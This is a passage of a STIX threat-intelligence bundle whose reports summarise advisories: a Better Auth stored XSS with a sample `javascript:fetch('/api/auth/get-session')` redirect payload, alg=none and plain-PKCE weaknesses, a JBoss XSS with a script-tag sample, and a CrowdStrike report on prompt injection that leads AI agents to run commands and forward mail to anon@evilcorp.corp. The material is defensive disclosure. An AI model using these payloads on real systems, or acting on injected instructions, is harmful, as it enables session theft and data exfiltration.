          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a49d09ee-9e79-50d4-9f33-b5c61ccb681e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--358ee0b8-5ebd-5535-967c-db89c5d6a1ba",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Zero Trust Exploitation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1561",
          "url": "https://attack.mitre.org/techniques/T1561"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0848b9c8-8bcb-59ce-af16-c826cfd1baaa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--358ee0b8-5ebd-5535-967c-db89c5d6a1ba",
      "target_ref": "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--358ee0b8-5ebd-5535-967c-db89c5d6a1ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better Auth Stored XSS via Malicious redirect_uri in oidc-provider and mcp Plugins",
      "description": "## Overview\n\nBetter Auth's `oidc-provider` and `mcp` plugins, prior to versions 1.6.13 (stable) and 1.7.0-beta.4 (pre-release), contain a stored DOM Cross-Site Scripting (XSS) vulnerability. The issue stems from insufficient validation of `redirect_uris` during OAuth client registration, allowing attackers to store `javascript:` scheme URIs. If an application's consent page, configured to use these vulnerable plugins, attempts to navigate to such a malicious `redirect_uri` after a user approves consent, attacker-controlled JavaScript will execute within the authorization server's origin. This enables session hijacking and potential account takeover. The `mcp` plugin is also affected as it wraps the same underlying provider. Exploitation requires user interaction on the consent page and specific client-side implementation of the consent page. While deprecated, these plugins remain published and are still in use, making an upgrade critical for affected deployments.\n\n## Attack Chain\n\n1.  **Initial Access / Client Registration:** An attacker (either authenticated by default, or unauthenticated if `allowDynamicClientRegistration: true` is enabled) sends a `POST` request to the `/oauth2/register` endpoint on the Better Auth server.\n2.  **Malicious `redirect_uri` Storage:** The attacker registers a new OAuth client, providing a malicious `redirect_uri` such as `javascript:fetch('/api/auth/get-session')//`. Due to lack of scheme validation in the `oidc-provider` or `mcp` plugin, this `javascript:` URI is stored.\n3.  **Authorization Request Initiation:** The attacker crafts an authorization request URL (e.g., `GET /oauth2/authorize?client_id=malicious_client\u0026redirect_uri=javascript:fetch('/api/auth/get-session')//\u0026...`) and socially engineers a victim to click it.\n4.  **Consent Page Presentation:** The victim navigates to the crafted authorization URL, which leads to the Better Auth consent page. This page displays the attacker-controlled client name and asks the user to approve access.\n5.  **Consent Approval \u0026 `redirectURI` Return:** The victim approves consent. The authorization server, still using the vulnerable plugin, processes the request, appends an authorization code, and returns the malicious `javascript:` URI (e.g., `{\"redirectURI\": \"javascript:fetch('/api/auth/get-session')//?code=...\"}`) to the client-side consent page.\n6.  **Client-Side Navigation \u0026 XSS Execution:** The vulnerable consent page, implemented to assign the returned `redirectURI` directly to a browser navigation target (e.g., `window.location.href` or `location.replace`), executes the attacker's embedded JavaScript payload within the authorization server's origin.\n7.  **Session Hijacking / Account Takeover:** The executed JavaScript (e.g., `fetch('/api/auth/get-session')`) can then interact with other session-scoped API endpoints, steal session tokens, or perform actions on behalf of the victim, leading to account takeover.\n\n## Impact\n\nThis vulnerability directly leads to stored DOM cross-site scripting (XSS) in the authorization server's own origin, resulting in severe consequences such as session hijacking and full account takeover. The impact is contingent on the victim interacting with a socially engineered link and approving consent, and critically, on the application's client-side consent page directly navigating to the returned `redirectURI` without proper scheme validation. While Better Auth itself does not perform this navigation, many applications naturally implement consent flows this way. The issue affects deployments using `oidc-provider` or `mcp` plugins, which remain widely available despite being deprecated. Organizations failing to upgrade or implement workarounds risk their users' sessions and accounts being compromised.\n\n## Recommendation\n\n*   **Upgrade Immediately:** Apply the security patches by upgrading to `better-auth@1.6.13` (stable) or `1.7.0-beta.4` (pre-release) to fix the improper `redirect_uri` validation as described in GHSA-86j7-9j95-vpqj.\n*   **Harden Consent Pages:** If immediate upgrade is not possible, harden your application's client-side consent page to explicitly validate the scheme of the returned `redirectURI`. Only navigate if `new URL(redirectURI).protocol` is `http:` or `https:`.\n*   **Migrate to `@better-auth/oauth-provider`:** Migrate from the deprecated `oidc-provider` or `mcp` plugins to `@better-auth/oauth-provider`, which already incorporates robust `redirect_uri` validation.\n*   **Restrict Client Registration:** Ensure `allowDynamicClientRegistration` remains at its default of `false` to limit client registration to authenticated users, reducing the attack surface for the malicious `redirect_uri` (IOC `javascript:fetch('/api/auth/get-session')//`).\n",
      "published": "2026-07-07T20:58:03Z",
      "labels": [
        "xss",
        "web-application",
        "javascript",
        "oauth",
        "account-takeover",
        "session-hijacking"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--4430a3a7-807e-5ad8-932d-e1b65d98106a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-86j7-9j95-vpqj"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/79.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/601.html"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc6749#section-3.1.2"
        },
        {
          "source_name": "reference",
          "url": "https://developer.mozilla.org/en-US/docs/Web/URI/Reference/Schemes/javascript"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14499faa-61d5-564d-ad48-0115f8af515f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85efe16c-8574-506d-a8f1-df2fc7aafbdf",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85efe16c-8574-506d-a8f1-df2fc7aafbdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better-Auth Library Vulnerable to Unsigned Token Acceptance and PKCE Plain Downgrade",
      "description": "## Overview\n\nThe `better-auth` library, in versions prior to 1.6.11, contains two critical cryptographic vulnerabilities within its `oidcProvider` and `mcp` plugins. These plugins, intended for OpenID Connect (OIDC) provisioning, by default advertise `\"none\"` as a supported signing algorithm for ID tokens in their discovery documents, enabling relying parties to accept unsigned tokens and facilitating authentication bypass. Additionally, the library defaults to accepting PKCE `plain` challenges, which are explicitly forbidden by RFC 9700 (OAuth 2.1) and leave authorization codes vulnerable to interception and exploitation if the authorization URL is exposed. While the library itself doesn't offer a direct attack vector, it creates conditions for attackers to forge tokens or hijack sessions, impacting any application that integrates these vulnerable `better-auth` plugins. The issue affects applications that have not migrated to the recommended `@better-auth/oauth-provider` package.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification**: An attacker identifies a target application utilizing a vulnerable version of `better-auth` with the `oidcProvider` or `mcp` plugins. They query the application's OIDC `.well-known/openid-configuration` endpoint and observe that `id_token_signing_alg_values_supported` includes `\"none\"`.\n2.  **Forge Unsigned ID Token**: The attacker crafts a JSON Web Token (JWT) where the header's `alg` field is explicitly set to `\"none\"`, and the payload contains desired claims (e.g., user ID, roles) to impersonate a legitimate user or grant elevated privileges.\n3.  **Present Forged Token to Relying Party**: The attacker submits this forged, unsigned ID token to a client application (relying party) that integrates with the vulnerable `better-auth` OIDC provider for authentication.\n4.  **Bypass Authentication (Alg=none)**: If the relying party's JWT validation library performs algorithm negotiation and accepts `\"none\"` as a valid signing algorithm (as advertised by the vulnerable `better-auth` server), it will mistakenly consider the forged token legitimate.\n5.  **Gain Unauthorized Access**: The attacker successfully bypasses authentication mechanisms, gaining unauthorized access to the client application and its protected resources under the identity of the impersonated user.\n6.  **Authorization Code Interception (PKCE plain)**: Separately or in conjunction, if the application's authorization URL (containing the `code_challenge` parameter) is exposed through insecure logging, browser history, referrer headers, or network interception, an attacker can capture it. Since `plain` PKCE is enabled, the `code_challenge` is simply the `code_verifier`.\n7.  **Exchange Code without PKCE Protection**: The attacker uses the intercepted authorization code and the `plain` `code_challenge` (which is the verifier) to make a request to the OIDC provider's token endpoint to obtain access and refresh tokens.\n8.  **Session Hijacking/Unauthorized Access (PKCE plain)**: With the obtained tokens, the attacker can hijack the legitimate user's session, make unauthorized API calls, or access resources, as the `plain` PKCE method provides no cryptographic binding or protection against authorization code interception.\n\n## Impact\n\nThe insecure defaults in `better-auth` can lead to severe consequences for affected applications and their users. The ability to accept unsigned tokens (CVE-2024-XXXX, CWE-327) allows attackers to forge ID tokens, resulting in complete authentication bypass and unauthorized access to systems and sensitive data. This can lead to data breaches, privilege escalation, and financial fraud. The default acceptance of PKCE `plain` (CWE-1188) can facilitate authorization code interception attacks, allowing attackers to hijack user sessions if the authorization URL is exposed, undermining the security of OAuth 2.1 flows (RFC 9700 non-conformance). Organizations in any sector using the vulnerable library components could be affected, leading to significant reputational damage, regulatory fines, and operational disruption.\n\n## Recommendation\n\n*   **Upgrade `better-auth` immediately**: Update all applications using `better-auth` to version `1.6.11` or later to apply the official patches.\n*   **Migrate to `@better-auth/oauth-provider`**: Plan and execute migration from the deprecated `oidcProvider` and `mcp` plugins to the `@better-auth/oauth-provider` package, which is unaffected by these defects.\n*   **Explicitly disable `plain` PKCE**: If immediate upgrade is not possible, explicitly configure `oidcProvider({ allowPlainCodeChallengeMethod: false })` (and for `mcp`) to mitigate the PKCE vulnerability.\n*   **Override OIDC metadata**: Implement workarounds to override the metadata to drop `\"none\"` from `id_token_signing_alg_values_supported` (e.g., `oidcProvider({ metadata: { id_token_signing_alg_values_supported: [\"RS256\"] } })`) to prevent unsigned token acceptance.\n*   **Review Relying Party Configurations**: Ensure all client applications (relying parties) that consume tokens from your `better-auth` OIDC provider explicitly pin to strong signing algorithms (e.g., RS256) and do not perform algorithm negotiation that would accept `alg=none`.\n",
      "published": "2026-07-07T20:56:57Z",
      "labels": [
        "vulnerability",
        "authentication",
        "oidc",
        "oauth",
        "library",
        "nodejs",
        "cryptographic-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9h47-pqcx-hjr4"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/327.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/757.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/1188.html"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc9700#section-2.1.1"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc8414#section-2"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--390703f5-9407-5c22-a966-3952932d31f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: anon@evilcorp.corp",
      "pattern": "[email-addr:value = 'anon@evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T07:51:34Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--30327411-c147-517e-a8ef-29522fd62007",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "indicator--390703f5-9407-5c22-a966-3952932d31f6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--154c6284-321a-5b91-bd29-a8d196cbfc33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: evilcorp.corp",
      "pattern": "[domain-name:value = 'evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T07:51:34Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--606e8e55-1462-5ca6-b62c-6cd546ed2cf9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "indicator--154c6284-321a-5b91-bd29-a8d196cbfc33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d6c7a2e8-dc1f-5e07-8e3a-cb7862d1881a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: HAXXOR",
      "pattern": "[x-ti-bot:other = 'HAXXOR']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T07:51:34Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b3610ab-209a-53c8-b19b-f9fbfa7bd895",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "indicator--d6c7a2e8-dc1f-5e07-8e3a-cb7862d1881a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8096c8d7-d6da-5c6a-9242-2b9bb2de7731",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b207ba5-f905-5b52-9b67-63c4bee69faf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa09b1bd-3ab4-5802-aae4-49bf874194b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e35eae31-0011-5a08-8588-9fb6375b444e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--afc4aa83-9473-5572-b1a4-7013ce0cc624",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike Uncovers New Prompt Injection Techniques",
      "description": "## Overview\n\nCrowdStrike's AI security research team has recently uncovered 18 new prompt injection techniques, significantly expanding their taxonomy to over 200 distinct methods observed in real-world AI systems. This development highlights the escalating sophistication of adversaries in manipulating AI agents and Large Language Models (LLMs). These advanced techniques allow attackers to bypass security mechanisms by exploiting hidden context, delayed triggers, semantic constraints, and structural cues, rather than overt jailbreaks. This can lead to AI agents being tricked into performing unauthorized actions, such as executing shell commands, exfiltrating sensitive data, or altering their internal rules. The insights are crucial for defenders as organizations increasingly adopt powerful AI agents that interact with critical resources like web pages, file stores, and internal systems, making robust AI threat modeling and red teaming essential to counter these evolving threats.\n\n## Attack Chain\n\n1. **Attacker Crafts Malicious Prompt**: Adversary designs a prompt containing hidden or fragmented malicious instructions, using techniques like \"Trigger-Activated Rule Addition,\" \"Cognitive Token Suppression,\" \"Algorithmic Payload Decomposition,\" or \"Special Token Injection.\"\n2. **Delivery via Unwitting User**: The malicious prompt is delivered to an AI agent, often through social engineering, where an authorized user is enticed to input the prompt into the AI system without realizing its true intent, such as copying from a compromised website or social media post.\n3. **AI Agent Processes Input**: The AI agent, designed to follow user instructions, processes the maliciously crafted prompt, which includes the hidden or fragmented commands.\n4. **Injection Technique Activation**: The embedded prompt injection technique successfully manipulates the AI's internal logic, causing it to misinterpret or prioritize the attacker's directives over its safety guidelines or original instructions. For example, a hidden rule is activated, or safety-related tokens are suppressed.\n5. **Unauthorized Tool Call/Action**: The compromised AI agent initiates an unauthorized action based on the injected instructions, such as making tool calls to `execute_sql_query`, generating unexpected responses, or attempting to write shell commands.\n6. **Data Exfiltration or Impact**: The AI agent, under the attacker's control, exfiltrates sensitive data (e.g., forwarding emails to `anon@evilcorp.corp`), modifies system configurations, or performs other actions impacting confidentiality, integrity, or availability.\n\n## Impact\n\nThe described prompt injection techniques enable adversaries to achieve significant impact on organizations leveraging AI agents. If successful, these attacks can lead to unauthorized data exfiltration, as demonstrated by the example of emails being duplicated and forwarded to attacker-controlled addresses. AI agents could be coerced into executing arbitrary shell commands, granting attackers remote code execution capabilities on underlying infrastructure. Furthermore, the manipulation of AI agents could result in the bypass of security controls, altered system behavior, and the generation of misleading or harmful content, leading to reputational damage, financial loss, and compromise of critical systems. These attacks target any organization integrating AI agents with access to internal systems or sensitive data.\n\n## Recommendation\n\n* Prioritize comprehensive AI threat modeling that accounts for all potential sources of model context, including prompts, files, RAG pipelines, and external APIs.\n* Enhance AI red teaming exercises to include advanced prompt injection techniques such as boundary mimicry, indirect injection, and delayed activation, beyond simple jailbreaking attempts.\n* Configure AI agent logging to capture tool calls and system interactions, and deploy the provided Sigma rule to detect suspicious outbound network connections to domains like `evilcorp.corp`.\n* Educate users about the risks of \"Unwitting User Delivery\" and social engineering tactics that entice them to input malicious prompts into AI systems.\n",
      "published": "2026-07-08T07:51:34Z",
      "labels": [
        "prompt-injection",
        "ai",
        "llm",
        "ai-security",
        "cloud",
        "novel-technique"
      ],
      "object_refs": [
        "indicator--390703f5-9407-5c22-a966-3952932d31f6",
        "indicator--154c6284-321a-5b91-bd29-a8d196cbfc33",
        "indicator--d6c7a2e8-dc1f-5e07-8e3a-cb7862d1881a",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d089093-b01b-57d3-91f1-2e6f437d5950",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--06f3b751-5416-5766-8128-d513c33977a7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--06f3b751-5416-5766-8128-d513c33977a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Red Hat JBoss Enterprise Application Platform Cross-Site Scripting Vulnerability",
      "description": "## Overview\n\nRed Hat JBoss Enterprise Application Platform is affected by a Cross-Site Scripting (XSS) vulnerability residing within its `io.undertow.jastow` component. This flaw, publicly disclosed on 2026-07-08 by BSI, permits a remote and unauthenticated attacker to inject malicious JavaScript code into web pages served by the platform. When an unsuspecting user visits a compromised page, their browser executes the attacker's script in the context of the affected JBoss domain. This can lead to various detrimental outcomes, including the theft of session cookies and sensitive user data, unauthorized actions performed on behalf of the victim, or defacement of the website. Defenders should prioritize patching this vulnerability to prevent potential client-side attacks against users accessing JBoss-hosted applications.\n\n## Attack Chain\n\n1. An attacker identifies a vulnerable input field or URL parameter within an application running on Red Hat JBoss Enterprise Application Platform, specifically leveraging the `io.undertow.jastow` component.\n2. The attacker crafts a malicious payload containing JavaScript code (e.g., `\u003cscript\u003ealert('XSS');\u003c/script\u003e`) and injects it into the vulnerable input field or URL.\n3. The JBoss server-side application, due to improper input sanitization or output encoding within the `io.undertow.jastow` component, incorporates the attacker's malicious payload directly into an HTML response.\n4. An unsuspecting victim's browser sends a request to the vulnerable JBoss application, which then returns the HTML response containing the embedded malicious script.\n5. Upon rendering the page, the victim's web browser executes the malicious JavaScript code in the context of the JBoss application's domain, inheriting its privileges.\n6. The executed script performs actions such as stealing the victim's session cookies, redirecting the user to a malicious site, performing unauthorized actions, or defacing the web page displayed to the victim.\n7. The attacker uses the stolen information (e.g., session cookies) to hijack the victim's session, gaining unauthorized access to their account or data.\n\n## Impact\n\nThe successful exploitation of this Cross-Site Scripting vulnerability can lead to significant consequences for users and organizations. Attackers can leverage the injected scripts to bypass security controls like the Same-Origin Policy, steal sensitive information such as authentication cookies and personal data from affected users, and perform actions on behalf of the victim. This can result in session hijacking, unauthorized access to user accounts, data exfiltration, or defacement of the affected web application. While the advisory does not specify observed victim counts or targeted sectors, any organization using the vulnerable Red Hat JBoss Enterprise Application Platform could be at risk.\n\n## Recommendation\n\n* Prioritize applying the latest security updates provided by Red Hat for JBoss Enterprise Application Platform to address the vulnerability in the `io.undertow.jastow` component.\n* Ensure all web applications hosted on JBoss Enterprise Application Platform implement robust input validation and output encoding to prevent similar XSS injection attacks.\n* Consider deploying a Content Security Policy (CSP) for web applications hosted on JBoss to mitigate the impact of potential XSS vulnerabilities by restricting script sources.\n* Monitor web server logs for suspicious HTTP requests containing script tags, special characters, or common XSS payloads in URL parameters or POST data.\n",
      "published": "2026-07-08T08:24:41Z",
      "labels": [
        "xss",
        "web-application",
        "jboss",
        "vulnerability",
        "red-hat"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2227"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6038df1a-fba8-50c6-b9b6-b6986270f560",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ebe78aa9-b0f1-5fe2-a8f9-c8107d7f4dd8",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ebe78aa9-b0f1-5fe2-a8f9-c8107d7f4dd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "GStreamer (webrtcbin): Vulnerability Allows Circumvention of Security Measures",
      "description": "## Overview\n\nA low-severity vulnerability (WID-SEC-2026-2229) has been identified in the `webrtcbin` component of GStreamer, a widely used open-source multimedia framework. This flaw, reported by the German Federal Office for Information Security (BSI), allows a remote, unauthenticated attacker to bypass existing security measures. The advisory currently lacks specific technical details regarding the vulnerability's nature, the precise method of exploitation, or the exact security controls that can be circumvented. Consequently, the immediate post-exploitation impact beyond the bypass itself is not described. Organizations utilizing GStreamer, especially those implementing WebRTC functionalities, should be aware of this vulnerability and plan for updates. The advisory does not indicate observed exploitation in the wild or specific targeting.\n\n## Attack Chain\n\n1. A remote, anonymous attacker identifies a system or application running GStreamer with the `webrtcbin` component exposed, typically over a network.\n2. The attacker crafts and sends a specific, malicious input or sequence of inputs to the vulnerable `webrtcbin` component. The exact nature of this malicious input is not detailed in the advisory.\n3. Successful processing of this crafted input by the GStreamer `webrtcbin` component triggers an unspecified vulnerability.\n4. The exploitation of this vulnerability directly results in the circumvention or bypass of existing security measures within the affected system or application.\n5. The advisory does not provide technical specifics on what security measures are bypassed, the resulting state of the system, or any further attacker actions beyond this bypass.\n6. The ultimate objective and potential deeper impact (e.g., unauthorized access, data exposure, code execution) remain unspecified and would likely depend on chaining with other vulnerabilities or system configurations.\n\n## Impact\n\nWhile the specific \"security measures\" that can be bypassed are not detailed in the advisory, any successful circumvention of protective mechanisms could lead to unintended access, expose sensitive data, or weaken the security posture of systems relying on GStreamer's WebRTC capabilities. Given the low severity rating, the immediate, unchained impact might be limited to a partial or temporary bypass, but such a vulnerability could potentially be combined with other flaws to achieve a more significant compromise. The advisory does not specify any observed victim organizations, affected sectors, or quantitative damage.\n\n## Recommendation\n\n* Prioritize updating GStreamer installations, particularly those utilizing the `webrtcbin` component, to the latest patched version once available, to address this vulnerability.\n* Review configurations of applications that leverage the `GStreamer (webrtcbin)` component for any unusual activity that could indicate a security bypass attempt.\n",
      "published": "2026-07-08T08:30:07Z",
      "labels": [
        "vulnerability",
        "security-bypass",
        "webrtc",
        "gstreamer"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2229"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bb9d7f65-66c3-5a1e-b9f3-5ade7e09657c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a7f96af4-e326-59bf-a437-c5d180830a3c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
